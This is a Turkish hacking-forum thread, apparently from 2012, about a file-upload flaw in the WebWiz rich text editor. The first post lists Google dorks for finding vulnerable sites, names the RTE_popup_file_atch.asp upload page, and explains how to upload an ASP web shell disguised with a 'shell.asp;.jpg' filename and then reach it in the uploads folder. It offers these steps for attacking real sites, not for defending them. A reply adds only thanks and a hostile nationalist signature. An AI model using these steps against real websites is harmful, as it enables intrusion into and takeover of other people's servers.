THT DUYURU

chat
Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

ugursuz reklam
takipci
Seçenekler

Webwiz RTE Açığı

Ymz Krtprk - ait Kullanıcı Resmi (Avatar)
Hesap Askıya Alındı
Üyelik tarihi:
05/2012
Nereden:
Bruksel
Mesajlar:
133
Konular:
65
Teşekkür (Etti):
11
Teşekkür (Aldı):
8
Ticaret:
(0) %
1
2069
15-06-2012 19:51
#1
Google Dorks:
inurl:rte/my_********s/my_files/
inurl:/my_********s/my_files/

Exploit: site.com/rte/RTE_popup_file_atch.asp

Örnek:
Siteleri arattık rte uzantısı şu şekil çıktı; Hacked_bY_iLLuminate_d3moN şimdi sitenin sonuna upload linkini yapıştırıcaz;

Attach File Properties

açılan sitede jpg shell imizi upload ediyoruz shell.asp;.jpg sonra upload linkimizin olduğu yere gidiyoruz. o dizinde /my_********s/my_files/ burası oluyor.

https://tik.lat/euhns
scoobydoo - ait Kullanıcı Resmi (Avatar)
Yeni Üye
Üyelik tarihi:
01/2012
Nereden:
Yer Altı Teknolejilerinin İçinde Trojan Mahalesinin Yanındaki Hack Sokağının Oradaki Sızıntıda
Mesajlar:
622
Konular:
130
Teşekkür (Etti):
21
Teşekkür (Aldı):
66
Ticaret:
(0) %
27-06-2012 17:26
#2
Saol kardeş
---------------------
Ey İnsan Oğlu Biz Türküz Bir Varızdır Yarın Yokuzdur
Bizim Yokluğumuzu Fırsat Bilip Yok Olursunuz
Biz Hayata İken Kardes Kanı Akıtıp Terör İçin Mücadele Etseniz Bile
Bu Hayatı Size Dar Edeceğiz ...
EY Ulan Duy Bu Sözümü İt Pkklılar
Gidişim Suskun Oldu Dönüşüm Böyle Olmayacak

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler